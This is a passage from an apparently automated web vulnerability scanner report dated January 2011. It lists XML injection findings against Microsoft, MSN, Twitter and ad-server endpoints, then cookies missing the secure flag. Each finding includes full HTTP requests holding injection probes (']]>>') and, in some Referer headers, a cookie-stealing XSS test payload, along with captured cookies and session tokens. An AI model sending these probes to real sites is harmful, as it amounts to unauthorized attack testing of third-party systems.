X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB35
Cache-Control: private, max-age=86400
Date: Sun, 30 Jan 2011 19:37:31 GMT
Connection: close
Vary: Accept-Encoding

...<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/199
...[SNIP]...

9.16. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [minimumTermLength parameter]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://i4.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The minimumTermLength parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the minimumTermLength parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /search/Widgets/SearchBox.jss?appid=1000&scopeid=1&boxId=searchBox&btnId=submitSearch&watermark=Search%20all%20projects&overrideWatermark=true&searchLocation=%2fsite%2fsearch&allowEmptySearch=true&focusOnInit=True&minimumTermLength=3]]>> HTTP/1.1
Host: i4.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://silverlight.codeplex.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_NVR_RU=0=technet:1=:2=; MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/12/2011 02:50:01&Microsoft.VisitStartDate=01/12/2011 02:50:01&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0237-9950-5424-5770; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1294837831501:ss=1294837831501; omniID=1294458843112_6a73_9555_4be9_86ce555049db; msdn=L=1033; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; ixpLightBrowser=0

Response

HTTP/1.1 400 Bad Request
Content-Length: 1647
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB29
Cache-Control: private, max-age=86400
Date: Sun, 30 Jan 2011 19:37:33 GMT
Connection: close
Vary: Accept-Encoding

...<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/199
...[SNIP]...

9.17. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [overrideWatermark parameter]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://i4.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The overrideWatermark parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the overrideWatermark parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /search/Widgets/SearchBox.jss?appid=1000&scopeid=1&boxId=searchBox&btnId=submitSearch&watermark=Search%20all%20projects&overrideWatermark=true]]>>&searchLocation=%2fsite%2fsearch&allowEmptySearch=true&focusOnInit=True&minimumTermLength=3 HTTP/1.1
Host: i4.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://silverlight.codeplex.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_NVR_RU=0=technet:1=:2=; MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/12/2011 02:50:01&Microsoft.VisitStartDate=01/12/2011 02:50:01&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0237-9950-5424-5770; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1294837831501:ss=1294837831501; omniID=1294458843112_6a73_9555_4be9_86ce555049db; msdn=L=1033; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; ixpLightBrowser=0

Response

HTTP/1.1 400 Bad Request
Content-Length: 1647
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB35
Cache-Control: private, max-age=86400
Date: Sun, 30 Jan 2011 19:37:27 GMT
Connection: close
Vary: Accept-Encoding

...<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/199
...[SNIP]...

9.18. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [scopeid parameter]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://i4.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The scopeid parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the scopeid parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /search/Widgets/SearchBox.jss?appid=1000&scopeid=1]]>>&boxId=searchBox&btnId=submitSearch&watermark=Search%20all%20projects&overrideWatermark=true&searchLocation=%2fsite%2fsearch&allowEmptySearch=true&focusOnInit=True&minimumTermLength=3 HTTP/1.1
Host: i4.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://silverlight.codeplex.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_NVR_RU=0=technet:1=:2=; MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/12/2011 02:50:01&Microsoft.VisitStartDate=01/12/2011 02:50:01&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0237-9950-5424-5770; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1294837831501:ss=1294837831501; omniID=1294458843112_6a73_9555_4be9_86ce555049db; msdn=L=1033; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; ixpLightBrowser=0

Response

HTTP/1.1 400 Bad Request
Content-Length: 1647
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB32
Cache-Control: private, max-age=86400
Date: Sun, 30 Jan 2011 19:37:22 GMT
Connection: close
Vary: Accept-Encoding

...<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/199
...[SNIP]...

9.19. http://img.widgets.video.s-redacted/resource.aspx [responseEncoding parameter]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://img.widgets.video.s-redacted
Path:   /resource.aspx

Issue detail

The responseEncoding parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the responseEncoding parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /resource.aspx?resources=gallery&gmts=gmt&mkt=&configCsid=MSNmoney&configName=money-gallery-v2-site-wide&responseEncoding=json]]>>&callbackName=Msn.Video.JavascriptApi.onComplete&cd=0 HTTP/1.1
Host: img.widgets.video.s-msn.com
Proxy-Connection: keep-alive
Referer: http://money.redacted//?4ae1b
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=1800
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Age: 2
Date: Sun, 30 Jan 2011 19:38:33 GMT
Last-Modified: Sun, 30 Jan 2011 19:38:32 GMT
Expires: Sun, 30 Jan 2011 20:08:31 GMT
Connection: keep-alive
Content-Length: 11430

...<?xml version="1.0" encoding="utf-8"?><xml><config><default><d k="gallery.defaultView" v="Grid" /><d k="gallery.dispContainer" v="false" /><d k="gallery.imageHeightGrid" v="77" /><d k="gallery.imag
...[SNIP]...

9.20. http://platform.twitter.com/anywhere.js [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /anywhere.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /anywhere.js]]>>?v=1&id= HTTP/1.1
Host: platform.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=43838368.lang%3A%20en; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; __utma=43838368.1078689092.1296223511.1296232506.1296314194.3; k=173.193.214.243.1296227675375304;

Response

HTTP/1.1 403 Forbidden
Content-Type: application/xml
Date: Sun, 30 Jan 2011 02:17:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>DF4508E035BED355</RequestId><HostId>5eaf9xpzYqO1Ts+3wPR0JLFqTIslfmZPq7Ruu2tR2NFB4jt60v
...[SNIP]...

9.21. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform0.twitter.com
Path:   /widgets/tweet_button.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets]]>>/tweet_button.html?_=1296391709300&count=horizontal&lang=en&related=breakingnews%3AThe%20fastest%20breaking%20news%20on%20Twitter.&text=Lawrence%3A%20'Palin's%20stock%20cannot%20go%20up'&url=http%3A%2F%2Fthelastword.msnbc.redacted%2F_news%2F2011%2F01%2F28%2F5941104-lawrence-palins-stock-cannot-go-up&via=thelastword HTTP/1.1
Host: platform0.twitter.com
Proxy-Connection: keep-alive
Referer: http://thelastword.msnbc.redacted/?1406b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2b8d8f3d529=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1296227675375304; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; __utma=43838368.1078689092.1296223511.1296232506.1296314194.3; __utmv=43838368.lang%3A%20en

Response

HTTP/1.1 403 Forbidden
Content-Type: application/xml
Date: Sun, 30 Jan 2011 19:59:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>0D13A4385943B1EE</RequestId><HostId>I2Cxu96Bc3Ib70OwqwF/Q4O/TfYE5Blgo4e50/9Vid7qqDqvRW
...[SNIP]...

9.22. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform0.twitter.com
Path:   /widgets/tweet_button.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets/tweet_button.html]]>>?_=1296391709300&count=horizontal&lang=en&related=breakingnews%3AThe%20fastest%20breaking%20news%20on%20Twitter.&text=Lawrence%3A%20'Palin's%20stock%20cannot%20go%20up'&url=http%3A%2F%2Fthelastword.msnbc.redacted%2F_news%2F2011%2F01%2F28%2F5941104-lawrence-palins-stock-cannot-go-up&via=thelastword HTTP/1.1
Host: platform0.twitter.com
Proxy-Connection: keep-alive
Referer: http://thelastword.msnbc.redacted/?1406b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2b8d8f3d529=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1296227675375304; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; __utma=43838368.1078689092.1296223511.1296232506.1296314194.3; __utmv=43838368.lang%3A%20en

Response

HTTP/1.1 403 Forbidden
Content-Type: application/xml
Date: Sun, 30 Jan 2011 19:59:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>BB42C0F6706A07F3</RequestId><HostId>7Zn86K+sg0EvaXJCBHyIanr9wyBBkM89+vhYKFZCDz2ackj4ZM
...[SNIP]...

9.23. https://security.live.com/LoginStage.aspx [lmif parameter]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://security.live.com
Path:   /LoginStage.aspx

Issue detail

The lmif parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the lmif parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /LoginStage.aspx?lmif=1000]]>>&ru=https://login.live.com/login.srf%3Fwa%3Dwsignin1.0%26rpsnv%3D11%26ct%3D1296342524%26rver%3D6.1.6206.0%26wp%3DMBI%26wreply%3Dhttp:%252F%252Fmail.live.com%252F%253Frru%253Dhome%2526livecom%253D1%26id%3D251248%26cbcxt%3Dhom%26vv%3D900%26mkt%3DEN-US%26lc%3D1033&wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&cbcxt=hom&vv=900&mkt=EN-US&lc=1033&cbid=0&id=64855 HTTP/1.1
Host: security.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 29 Jan 2011 23:14:46 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: TK2IDSTOOL1B05 V: 0
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
X-UA-Compatible: IE=7
Set-Cookie: mkt=ep=en-US; domain=.live.com; path=/
Set-Cookie: ASP.NET_SessionId=ozj3eqaylrhs4245xacvnj55; path=/; HttpOnly
Set-Cookie: xid=8734b762-01b6-4243-a196-1dde28c1274d&&TK2xxxxxxx1B05&61; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: mktstate=S=783525862&U=&E=en-us&B=en&P=; domain=.live.com; path=/
Set-Cookie: mkt1=norm=en-us; domain=.live.com; path=/
Set-Cookie: mkt2=marketing=en-us; domain=.security.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Sat, 29-Jan-2011 21:34:46 GMT; path=/
Set-Cookie: wlv=A|_-d:s*5hzLBQ.2+1+0+3; domain=.live.com; path=/
Set-Cookie: PreScript=; path=/
Set-Cookie: E=P:rb9ydCGOzYg=:b5fPIpVKfwyqwhDlUnnLRb9EGUhzmv2Yv1+StJ/w1zI=:F; domain=.live.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text
...[SNIP]...
<script type="text/javascript">
ltr = 1;
currentVersion = '9.000.16531.00';
XML.SetAjaxErrorString('Sorry we couldn\'t complete your request.&nbsp; Please try again.');
Wait.waitText = 'Please wait...';
</script>
...[SNIP]...

9.24. http://services.money.redacted/QuoteService/dynamic [format parameter]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://services.money.msn.com
Path:   /QuoteService/dynamic

Issue detail

The format parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the format parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /QuoteService/dynamic?format=json]]>>&symbol= HTTP/1.1
Host: services.money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:19:07 GMT
Connection: close
Content-Length: 51

<?xml version="1.0" encoding="utf-8"?><root></root>

9.25. http://services.money.redacted/quoteservice/streaming [format parameter]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://services.money.msn.com
Path:   /quoteservice/streaming

Issue detail

The format parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the format parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /quoteservice/streaming?format=json]]>>&symbol= HTTP/1.1
Host: services.money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:19:09 GMT
Connection: close
Content-Length: 51

<?xml version="1.0" encoding="utf-8"?><root></root>

9.26. http://srv.admailtiser.com/pix/master_pixel.js [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://srv.admailtiser.com
Path:   /pix/master_pixel.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /pix]]>>/master_pixel.js HTTP/1.1
Host: srv.admailtiser.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cicouid=cc7abda8-722d-4cd3-b76a-29b02a48647arcjRQOvWHnoil_sqd2OXzw; ciconv0=6940311042157494960$8601-c1fe3893-3748-4f39-bb7c-f9bd561f5dc2;

Response

HTTP/1.0 404 Not Found
x-amz-request-id: 0961C9CA9A5345B1
x-amz-id-2: hLB+PJXuytjuMcgNsKJJYZgMfWLZTB79WR/JkxL6UakMRmJ4dBgqA0aC3NC5b6be
Content-Type: application/xml
Date: Sun, 30 Jan 2011 02:19:28 GMT
Server: AmazonS3
Age: 1
Content-Length: 288
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 832ca13cd8d1a57caa5aeda99dfa54eeb25be5d7529fff10d1ba00e12b1e100bd766d00b0203de38
Via: 1.0 de8307e7de3620df506484cdd13a4606.cloudfront.net:11180 (CloudFront), 1.0 c3dbce96ffc5d90223789659f3b896a1.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>pix]]&gt;&gt;/master_pixel.js</Key><RequestId>0961C9CA9A5345B1</RequestId><
...[SNIP]...

9.27. http://srv.admailtiser.com/pix/master_pixel.js [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://srv.admailtiser.com
Path:   /pix/master_pixel.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /pix/master_pixel.js]]>> HTTP/1.1
Host: srv.admailtiser.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cicouid=cc7abda8-722d-4cd3-b76a-29b02a48647arcjRQOvWHnoil_sqd2OXzw; ciconv0=6940311042157494960$8601-c1fe3893-3748-4f39-bb7c-f9bd561f5dc2;

Response

HTTP/1.0 404 Not Found
x-amz-request-id: EE3EF78EC3A56325
x-amz-id-2: tn3j7/pY3zUPy2FZhprUHOFaNaN7Z7j0mX6mlU1O82AMVunyu0q2Xr82FNiy3M4J
Content-Type: application/xml
Date: Sun, 30 Jan 2011 02:19:31 GMT
Server: AmazonS3
Content-Length: 288
X-Cache: Error from cloudfront
X-Amz-Cf-Id: e3e74461d12e8c1e0ec2857ffc0cd2715d7227c456be284ad14176c3ac6a859a9c55fcf9b6eb1e40
Via: 1.0 7968d93e1fd68721fd2c757c85758124.cloudfront.net:11180 (CloudFront), 1.0 c3dbce96ffc5d90223789659f3b896a1.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>pix/master_pixel.js]]&gt;&gt;</Key><RequestId>EE3EF78EC3A56325</RequestId><
...[SNIP]...

10. SSL cookie without secure flag set
There are 26 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


10.1. https://careers.microsoft.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://careers.microsoft.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: careers.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://careers.microsoft.com/gclp.aspx
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=imfrgsjgkicnzcjt42531kjd; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=h2kb0f3zzbexr4550xzpoczx; path=/; HttpOnly
Set-Cookie: SessionProfile=imfrgsjgkicnzcjt42531kjd; path=/; secure
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Date: Sat, 29 Jan 2011 23:45:40 GMT
Connection: close
Content-Length: 155

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://careers.microsoft.com/gclp.aspx">here</a>.</h2>
</body></html>

10.2. https://login.silverlight.net/login/createuser.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://login.silverlight.net
Path:   /login/createuser.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:27:25 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:25 GMT
Content-Length: 9085


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Create
...[SNIP]...

